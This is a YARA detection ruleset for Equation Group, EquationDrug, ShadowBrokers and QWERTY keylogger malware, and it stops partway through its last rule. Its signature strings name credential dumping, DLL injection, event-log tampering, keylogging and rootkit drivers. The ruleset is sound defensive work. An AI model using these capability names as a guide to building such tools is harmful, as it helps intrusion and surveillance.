// EquationDrug installer (LUTEUSOBSTOS); the definition continues below.
rule Equation_Kaspersky_EquationDrugInstaller {
    meta:
        description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
        author
= "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
    strings:
        $mz = { 4d 5a }
        $s0 = "\\system32\\win32k.sys" fullword wide
        $s1 = "ALL_FIREWALLS" fullword ascii
        // $x1/$x4/$x5 are close variants of the names used by
        // apt_equation_exploitlib_mutexes; $x7 "BINRES" is the text encoded in
        // that rule set's hex string.
        $x1 = "@prkMtx" fullword wide
        $x2 = "STATIC" fullword wide
        $x3 = "windir" fullword wide
        $x4 = "cnFormVoidFBC" fullword wide
        $x5 = "CcnFormSyncExFBC" fullword wide
        $x6 = "WinStaObj" fullword wide
        $x7 = "BINRES" fullword wide
    condition:
        ( $mz at 0 ) and filesize < 500000 and all of ($s*) and 5 of ($x*)
}

// EquationLaser installer: MZ header, size cap and 6 of the 9 $s* strings.
rule Equation_Kaspersky_EquationLaserInstaller {
    meta:
        description = "Equation Group Malware - EquationLaser Installer"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "5e1f56c1e57fbff96d4999db1fd6dd0f7d8221df"
    strings:
        $mz = { 4d 5a }
        $s0 = "Failed to get Windows version" fullword ascii
        $s1 = "lsasrv32.dll and lsass.exe" fullword wide
        // UNC mailslot path template.
        $s2 = "\\\\%s\\mailslot\\%s" fullword ascii
        $s3 = "%d-%d-%d %d:%d:%d Z" fullword ascii
        $s4 = "lsasrv32.dll" fullword ascii
        $s5 = "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
fullword ascii
        $s6 = "%s %02x %s" fullword ascii
        $s7 = "VIEWERS" fullword ascii
        // Looks like a Windows Server 2003 ("srv03") file-version string carried by the sample.
        $s8 = "5.2.3790.220 (srv03_gdr.040918-1552)" fullword wide
    condition:
        ( $mz at 0 ) and filesize < 250000 and 6 of ($s*)
}

// Fanny worm: fanny.bmp paths on drive letters, USBSTOR/PartMgr enumeration
// keys and a Q:\ shortcut, i.e. strings pointing at removable media. Matches on
// 2 of the 3 $s* strings, or 1 $s* plus 6 $x*, or 14 of the 16 $x* strings.
rule Equation_Kaspersky_FannyWorm {
    meta:
        description = "Equation Group Malware - Fanny Worm"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
    strings:
        $mz = { 4d 5a }
        $s1 = "x:\\fanny.bmp" fullword ascii
        $s2 = "32.exe" fullword ascii
        $s3 = "d:\\fanny.bmp" fullword ascii
        $x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
        $x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
        $x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
        $x4 = "\\system32\\win32k.sys" fullword wide
        $x5 = "\\AGENTCPD.DLL" fullword ascii
        $x6 = "agentcpd.dll" fullword ascii
        $x7 = "PADupdate.exe" fullword ascii
        $x8 = "dll_installer.dll" fullword ascii
        $x9 = "\\restore\\" fullword ascii
        $x10 = "Q:\\__?__.lnk" fullword ascii
        $x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
        $x12 = "\\shelldoc.dll" fullword ascii
        $x13 = "file size = %d bytes" fullword ascii
        $x14 = "\\MSAgent" fullword ascii
        $x15 = "Global\\RPCMutex" fullword ascii
        $x16 = "Global\\DirectMarketing" fullword ascii
    condition:
        ( $mz at 0 ) and filesize < 300000 and (( 2 of ($s*) ) or ( 1 of ($s*) and 6 of ($x*) ) or ( 14 of ($x*)))
}

// HDD firmware reprogramming module nls_933w.dll. Same sample hash as
// EquationDrug_HDDSSD_Op; this variant additionally requires the MZ header,
// the size cap and the HAL / spinlock / register-access names, so it is the
// higher-confidence of the two.
rule Equation_Kaspersky_HDD_reprogramming_module {
    meta:
        description = "Equation Group Malware - HDD reprogramming module"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
    strings:
        $mz = { 4d 5a }
        $s0 = "nls_933w.dll" fullword ascii
        $s1 = "BINARY" fullword wide
        $s2 = "KfAcquireSpinLock" fullword ascii
        $s3 = "HAL.dll" fullword ascii
        $s4 = "READ_REGISTER_UCHAR" fullword ascii
    condition:
        ( $mz at 0 ) and filesize < 300000 and all of ($s*)
}

// EoP package / malware launcher; the definition continues below.
rule Equation_Kaspersky_EOP_Package {
    meta:
        description =
"Equation Group Malware - EoP package and malware launcher"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
    strings:
        $mz = { 4d 5a }
        $s0 = "abababababab" fullword ascii
        $s1 = "abcdefghijklmnopq" fullword ascii
        $s2 = "@STATIC" fullword wide
        $s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
        // prkMtx / cnFormVoidFBC recur across the Equation rules in this file.
        $s4 = "@prkMtx" fullword wide
        $s5 = "prkMtx" fullword wide
        $s6 = "cnFormVoidFBC" fullword wide
    condition:
        ( $mz at 0 ) and filesize < 100000 and all of ($s*)
}

// TripleFantasy loader. The $s* strings are "hnetcfg.<export>" names and $x3 is
// the ahlhcib.dll name also used by Equation_Kaspersky_TripleFantasy_1 (whose
// $s0 references hnetcfg.dll), so the loader presumably poses as that DLL.
// All $x* and all $s* are required, with a tight 50000-byte size cap.
rule Equation_Kaspersky_TripleFantasy_Loader {
    meta:
        description = "Equation Group Malware - TripleFantasy Loader"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/16"
        hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
    strings:
        $mz = { 4d 5a }
        $x1 = "Original Innovations, LLC" fullword wide
        // "Moniter" is the spelling found in the sample; do not correct it.
        $x2 = "Moniter Resource Protocol" fullword wide
        $x3 = "ahlhcib.dll" fullword wide
        $s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
        $s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
        $s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
        $s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
        $s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
        $s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
    condition:
        ( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
}

/* Rule generated from the mentioned keywords */

// Keyword rule (score 60): every one of the six strings must be present, which
// keeps it narrow despite the report-like, human-readable strings.
rule Equation_Kaspersky_SuspiciousString {
    meta:
        description = "Equation Group Malware - suspicious string found in sample"
        author = "Florian Roth"
        reference = "http://goo.gl/ivt8EW"
        date = "2015/02/17"
        score = 60
    strings:
        $mz = { 4d 5a }
        $s1 = "i386\\DesertWinterDriver.pdb" fullword
        $s2 = "Performing UR-specific post-install..."
        $s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
$s4 = "STRAITSHOOTER30.exe"
        $s5 = "standalonegrok_2.1.1.1"
        // Same user-profile path as $s0 in Equation_Kaspersky_GROK_Keylogger.
        $s6 = "c:\\users\\rmgree5\\"
    condition:
        ( $mz at 0 ) and filesize < 500000 and all of ($s*)
}

/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */

// EquationDrug network-sniffer backdoor driver (mstcp32.sys / fat32.sys). All
// strings are required; the \Device\%ws_%ws and \DosDevices\%ws format strings
// recur in the other EquationDrug driver rules below.
rule EquationDrug_NetworkSniffer1 {
    meta:
        description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
    strings:
        $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
        $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
        $s3 = "sys\\mstcp32.dbg" fullword ascii
        $s7 = "mstcp32.sys" fullword wide
        $s8 = "p32.sys" fullword ascii
        $s9 = "\\Device\\%ws_%ws" fullword wide
        $s10 = "\\DosDevices\\%ws" fullword wide
        $s11 = "\\Device\\%ws" fullword wide
    condition:
        all of them
}

// Unilay.DLL compatibility layer: MZ header plus the bare DLL name.
rule EquationDrug_CompatLayer_UnilayDLL {
    meta:
        description = "EquationDrug - Unilay.DLL"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
    strings:
        $mz = { 4d 5a }
        $s0 = "unilay.dll" fullword ascii
    condition:
        ( $mz at 0 ) and $s0
}

// HDD/SSD firmware module nls_933w.dll. Unlike the sibling rule
// Equation_Kaspersky_HDD_reprogramming_module (same hash), this one has no MZ
// or size gate and only a single string, so it also fires on any text or
// document that merely mentions the file name; treat a hit from this rule
// alone as low confidence.
rule EquationDrug_HDDSSD_Op {
    meta:
        description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
    strings:
        $s0 = "nls_933w.dll" fullword ascii
    condition:
        all of them
}

// Network sniffer driver tdip.sys (first of two tdip.sys rules; the second,
// EquationDrug_NetworkSniffer3, covers a different hash).
rule EquationDrug_NetworkSniffer2 {
    meta:
        description = "EquationDrug - Network Sniffer - tdip.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date =
"2015/03/11"
        hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
    strings:
        $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
        $s1 = "IP Transport Driver" fullword wide
        $s2 = "tdip.sys" fullword wide
        $s3 = "sys\\tdip.dbg" fullword ascii
        $s4 = "dip.sys" fullword ascii
        $s5 = "\\Device\\%ws_%ws" fullword wide
        $s6 = "\\DosDevices\\%ws" fullword wide
        $s7 = "\\Device\\%ws" fullword wide
    condition:
        all of them
}

// Second tdip.sys variant: keyed on copyright-style text and the PDB name
// rather than the device-name format strings. All four strings required.
rule EquationDrug_NetworkSniffer3 {
    meta:
        description = "EquationDrug - Network Sniffer - tdip.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "14599516381a9646cd978cf962c4f92386371040"
    strings:
        $s0 = "Corporation. All rights reserved." fullword wide
        $s1 = "IP Transport Driver" fullword wide
        $s2 = "tdip.sys" fullword wide
        $s3 = "tdip.pdb" fullword ascii
    condition:
        all of them
}

// Volrec collector plugin driver msrstd.sys: driver name, PDB name and
// description string are all required.
rule EquationDrug_VolRec_Driver {
    meta:
        description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
    strings:
        $s0 = "msrstd.sys" fullword wide
        $s1 = "msrstd.pdb" fullword ascii
        $s2 = "msrstd driver" fullword wide
    condition:
        all of them
}

// Kernel-mode stage 0 / rootkit driver msndsrv.sys; the definition continues below.
rule EquationDrug_KernelRootkit {
    meta:
        description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
    strings:
        $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
        $s1 = "Parmsndsrv.dbg" fullword ascii
        $s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
        $s3 = "msndsrv.sys" fullword wide
        $s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
        $s6
= "\\Device\\%ws_%ws" fullword wide
        $s7 = "\\DosDevices\\%ws" fullword wide
        $s9 = "\\Device\\%ws" fullword wide
    condition:
        all of them
}

// Key/clipboard logger driver msrtvd.sys. $s2 is a truncated (non-fullword)
// prefix of the Session Manager\Environment key that
// Equation_Kaspersky_GROK_Keylogger matches in full as $z4; $s0 is the same
// CurrentVersion path as that rule's $z2. All four strings required.
rule EquationDrug_Keylogger {
    meta:
        description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
    strings:
        $s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
        $s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
        $s3 = "\\DosDevices\\Gk" fullword wide
        $s5 = "\\Device\\Gk0" fullword wide
    condition:
        all of them
}

// Network sniffer/patcher atmdkdrv.sys. The RAVISENT / VIONA / CineMaster
// strings appear to be third-party product branding carried by the sample;
// every string, including those and the EquationDrug device-name format
// strings, is required.
rule EquationDrug_NetworkSniffer4 {
    meta:
        description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
    strings:
        $s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
        $s1 = "\\systemroot\\" fullword ascii
        $s2 = "RAVISENT Technologies Inc."
fullword wide
        $s3 = "Created by VIONA Development" fullword wide
        $s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
        $s5 = "\\device\\harddiskvolume" fullword wide
        $s7 = "ATMDKDRV.SYS" fullword wide
        $s8 = "\\Device\\%ws_%ws" fullword wide
        $s9 = "\\DosDevices\\%ws" fullword wide
        $s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
        $s11 = "\\Device\\%ws" fullword wide
        $s13 = "CineMaster C 1.1 WDM" fullword wide
    condition:
        all of them
}

// Platform orchestrator mscfg32.dll / svchost32.dll: the process names it
// references plus the unilay.dll name also matched by
// EquationDrug_CompatLayer_UnilayDLL. All strings required.
rule EquationDrug_PlatformOrchestrator {
    meta:
        description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
    strings:
        $s0 = "SERVICES.EXE" fullword wide
        $s1 = "\\command.com" fullword wide
        $s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
        $s3 = "LSASS.EXE" fullword wide
        $s4 = "Windows Configuration Services" fullword wide
        $s8 = "unilay.dll" fullword ascii
    condition:
        all of them
}

// Second atmdkdrv.sys variant (different hash from EquationDrug_NetworkSniffer4),
// keyed on the lowercase driver name and the shared device-name format strings.
rule EquationDrug_NetworkSniffer5 {
    meta:
        description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
    strings:
        $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
        $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
        $s2 = "atmdkdrv.sys" fullword wide
        $s4 = "\\Device\\%ws_%ws" fullword wide
        $s5 = "\\DosDevices\\%ws" fullword wide
        $s6 = "\\Device\\%ws" fullword wide
    condition:
        all of them
}

// Filesystem filter driver volrec.sys / scsi2mgr.sys; the definition continues below.
rule EquationDrug_FileSystem_Filter {
    meta:
        description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
        author = "Florian Roth @4nc4p"
        reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
        date = "2015/03/11"
        hash =
"57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
    strings:
        $s0 = "volrec.sys" fullword wide
        $s1 = "volrec.pdb" fullword ascii
        $s2 = "Volume recognizer driver" fullword wide
    condition:
        all of them
}

// Equation group keyword "Backsnarf_AB25" in either encoding, gated on the MZ
// header (uint16(0) == 0x5a4d is the bytes 4D 5A, "MZ", read little-endian).
rule apt_equation_keyword {
    meta:
        description = "Rule to detect Equation group's keyword in executable file"
        author = "Florian Roth @4nc4p"
        last_modified = "2015-09-26"
        reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
    strings:
        $a1 = "Backsnarf_AB25" wide
        $a2 = "Backsnarf_AB25" ascii
    condition:
        uint16(0) == 0x5a4d and 1 of ($a*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2017-01-08
    Identifier: ShadowBroker Screenshot Rules
*/

/* Rule Set ----------------------------------------------------------------- */

// Strings taken from the ShadowBrokers January 2017 screenshots of Windows
// tooling. The condition is a set of alternatives under a 2000KB cap: one tool
// name ($x*), both $a*, one $b*, one $c* or three $d* inside an MZ file, or
// three $c* in any file type. The condition continues below.
rule FVEY_ShadowBrokers_Jan17_Screen_Strings {
    meta:
        description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
        author = "Florian Roth"
        reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
        date = "2017-01-08"
    strings:
        $x1 = "Danderspritz" ascii wide fullword
        $x2 = "DanderSpritz" ascii wide fullword
        $x3 = "PeddleCheap" ascii wide fullword
        // "Addres" is the spelling as captured; do not correct it.
        $x4 = "ChimneyPool Addres" ascii wide fullword
        $a1 = "Getting remote time" fullword ascii
        $a2 = "RETRIEVED" fullword ascii
        $b1 = "Added Ops library to Python search path" fullword ascii
        $b2 = "target: z0.0.0.1" fullword ascii
        $c1 = "Psp_Avoidance" fullword ascii
        $c2 = "PasswordDump" fullword ascii
        $c3 = "InjectDll" fullword ascii
        $c4 = "EventLogEdit" fullword ascii
        $c5 = "ProcessModify" fullword ascii
        $d1 = "Mcl_NtElevation" fullword ascii wide
        $d2 = "Mcl_NtNativeApi" fullword ascii wide
        $d3 = "Mcl_ThreatInject" fullword ascii wide
        $d4 = "Mcl_NtMemory" fullword ascii wide
    condition:
        filesize < 2000KB and (1 of ($x*) or all of ($a*) or 1 of ($b*) or ( uint16(0)
== 0x5a4d and 1 of ($c*) ) or 3 of ($c*) or ( uint16(0) == 0x5a4d and 3 of ($d*) ))
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

/* FIVE EYES ------------------------------------------------------------------------------- */

// QWERTY plugin descriptor 20121.xml. The target is an XML file, so there is no
// PE header gate; 9 of the 11 element strings must be present. $s5..$s10 are
// generic elements shared with the 20120/20123 descriptor rules, so the
// file-specific $s0..$s2 carry the discrimination.
rule FiveEyes_QUERTY_Malwareqwerty_20121 {
    meta:
        description = "FiveEyes QUERTY Malware - file 20121.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
    strings:
        $s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
        $s1 = "<name>20121.dll</name>" fullword ascii
        $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
        $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
        $s4 = "<platform type=\"1\">" fullword ascii
        $s5 = "</plugin>" fullword ascii
        $s6 = "</pluginConfig>" fullword ascii
        $s7 = "<pluginConfig>" fullword ascii
        $s8 = "</platform>" fullword ascii
        $s9 = "</lpConfig>" fullword ascii
        $s10 = "<lpConfig>" fullword ascii
    condition:
        9 of them
}

// QWERTY kernel driver 20123.sys: references kbdclass.sys, ntoskrnl.exe and
// kernel routine names (IoFreeMdl, KfReleaseSpinLock), consistent with a
// keyboard-class driver. All five strings are required.
rule FiveEyes_QUERTY_Malwaresig_20123_sys {
    meta:
        description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
    strings:
        $s0 = "20123.dll" fullword ascii
        $s1 = "kbdclass.sys" fullword wide
        $s2 = "IoFreeMdl" fullword ascii
        $s3 = "ntoskrnl.exe" fullword ascii
        $s4 = "KfReleaseSpinLock" fullword ascii
    condition:
        all of them
}

// QWERTY 20123 command-definition XML; the definition continues below.
rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
    meta:
        description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
    strings:
        $s0 = "<shortDescription>Keystroke 
Collector</shortDescription>" fullword ascii
        $s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
        $s2 = "<commands/>" fullword ascii
        $s3 = "</version>" fullword ascii
        $s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
        $s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
        $s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
        $s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
        $s8 = "<dllDepend>None</dllDepend>" fullword ascii
        $s9 = "<minorType>0</minorType>" fullword ascii
        $s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
        $s11 = "</comments>" fullword ascii
        $s12 = "<comments>" fullword ascii
        $s13 = "<majorType>1</majorType>" fullword ascii
        $s14 = "<files>None</files>" fullword ascii
        $s15 = "<poc>Erebus</poc>" fullword ascii
        $s16 = "</plugin>" fullword ascii
        $s17 = "<team>None</team>" fullword ascii
        $s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
        $s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
        $s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
    condition:
        // Several strings ($s2, $s3, $s11, $s12, $s16) are generic XML tags; the
        // 14-of-21 threshold keeps the rule tied to this descriptor.
        14 of them
}

// QWERTY user-mode DLL 20121.dll: the WarriorPride package path and the DLL
// name, both required.
rule FiveEyes_QUERTY_Malwaresig_20121_dll {
    meta:
        description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "89504d91c5539a366e153894c1bc17277116342b"
    strings:
        $s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
        $s1 = "20121.dll" fullword ascii
    condition:
        all of them
}

// QWERTY plugin descriptor 20123.xml; the definition continues below.
rule FiveEyes_QUERTY_Malwareqwerty_20123 {
    meta:
        description = "FiveEyes QUERTY Malware - file 20123.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
    strings:
        $s0 = "<!-- edited with XMLSPY v5 rel. 
4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
        $s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
        $s2 = "<name>20123.sys</name>" fullword ascii
        $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
        $s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
        $s5 = "<platform type=\"1\">" fullword ascii
        $s6 = "</plugin>" fullword ascii
        $s7 = "</pluginConfig>" fullword ascii
        $s8 = "<pluginConfig>" fullword ascii
        $s9 = "</platform>" fullword ascii
        $s10 = "</lpConfig>" fullword ascii
        $s11 = "<lpConfig>" fullword ascii
    condition:
        // 9 of 12; $s5..$s11 are the generic elements shared with the 20121/20120
        // descriptor rules, so the file-specific $s0..$s4 carry the discrimination.
        9 of them
}

// QWERTY user-mode DLL 20120.dll: log-file name formats, status messages and
// help text about the keystroke log; 10 of the 21 strings suffice. $s6, $s10
// and $s19 look like standard locale descriptions that benign software may
// also carry, which is one reason the threshold is not lower.
rule FiveEyes_QUERTY_Malwaresig_20120_dll {
    meta:
        description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
    strings:
        $s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
        $s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
        $s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
        $s3 = "- Log Used (number of windows) - %d" fullword wide
        $s4 = "- Log Limit (number of windows) - %d" fullword wide
        $s5 = "Process or User Default Language" fullword wide
        $s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
        $s7 = "- Logging of keystrokes is switched ON" fullword wide
        $s8 = "- Logging of keystrokes is switched OFF" fullword wide
        $s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
        $s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
        $s11 = "FAILED to get Qwerty Status" fullword wide
        $s12 = "- Successfully retrieved Log from Implant." fullword wide
        $s13 = "- Logging of all Windows is toggled ON" fullword wide
        $s14 = "- Logging of all Windows is toggled OFF" fullword wide
        $s15 = "Qwerty FAILED to retrieve window list." fullword wide
        $s16 = "- UNSUCCESSFUL Log Retrieval from Implant." 
fullword wide
        $s17 = "The implant failed to return a valid status" fullword ascii
        $s18 = "- Log files were NOT generated!" fullword wide
        $s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
        $s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
    condition:
        10 of them
}

// QWERTY 20120 command-definition XML: command help text and element
// fragments; 10 of the 21 strings suffice. Misspellings inside the strings
// ("taht", "whish") are the text as found in the file and must not be
// "corrected", or the strings stop matching.
rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
    meta:
        description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
    strings:
        $s0 = "This PPC gets the current keystroke log." fullword ascii
        $s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
        $s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
        $s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
        $s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
        $s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
        $s6 = "<name>Get Keystroke Log</name>" fullword ascii
        $s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
        $s8 = "<definition>display help for this function</definition>" fullword ascii
        $s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
        $s10 = "Set the log limit (in number of windows)" fullword ascii
        $s11 = "<example>qwgetlog</example>" fullword ascii
        $s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
        $s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
        $s14 = "This command will switch OFF Logging of keys. 
No keystrokes will be captured" fullword ascii
        // "whish" is the spelling as found; do not correct it.
        $s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
        $s16 = "<command id=\"32\">" fullword ascii
        $s17 = "<command id=\"3\">" fullword ascii
        $s18 = "<command id=\"7\">" fullword ascii
        $s19 = "<command id=\"1\">" fullword ascii
        $s20 = "<command id=\"4\">" fullword ascii
    condition:
        10 of them
}

// QWERTY plugin descriptor 20120.xml: the same element set as the 20121
// descriptor rule apart from the file names, but here every string is
// required rather than 9 of 11.
rule FiveEyes_QUERTY_Malwareqwerty_20120 {
    meta:
        description = "FiveEyes QUERTY Malware - file 20120.xml"
        author = "Florian Roth"
        reference = "http://www.spiegel.de/media/media-35668.pdf"
        date = "2015/01/18"
        hash = "597082f05bfd3225587d480c30f54a7a1326a892"
    strings:
        $s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
        $s1 = "<name>20120.dll</name>" fullword ascii
